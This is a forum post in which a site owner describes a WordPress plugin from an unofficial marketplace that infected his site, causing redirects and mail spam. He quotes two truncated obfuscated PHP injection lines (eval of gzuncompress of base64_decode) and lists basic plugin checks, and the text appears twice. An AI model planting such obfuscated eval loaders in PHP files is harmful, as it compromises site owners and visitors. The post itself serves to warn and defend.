andrewtane
Active member
Hi all,
Recent days one of my site was down caused by a wp plugin (got from other marketplace) infected with malware and php injection, and got 100% cpu warning for mail spam. My site are redirect to other site.
all files are injected with this :
<?php eval(gzuncompress(base64_decode('eNqNWflTE9n2/1daauqZIAPZQ7R88xCDwiAoYVEnU6mb7hsSk3TndXckmflOsZTbqDOUC6jlL1IIuOFC1WhZU1YhLjMiKo7Ccxn1X...
and
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy.....
From this I start to learn how to check a wp plugin :

thank you.
Recent days one of my site was down caused by a wp plugin (got from other marketplace) infected with malware and php injection, and got 100% cpu warning for mail spam. My site are redirect to other site.
all files are injected with this :
<?php eval(gzuncompress(base64_decode('eNqNWflTE9n2/1daauqZIAPZQ7R88xCDwiAoYVEnU6mb7hsSk3TndXckmflOsZTbqDOUC6jlL1IIuOFC1WhZU1YhLjMiKo7Ccxn1X...
and
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy.....
From this I start to learn how to check a wp plugin :
- zip and send to trusted online virus scanner, if pass...
- check for php injection code
thank you.
Last edited: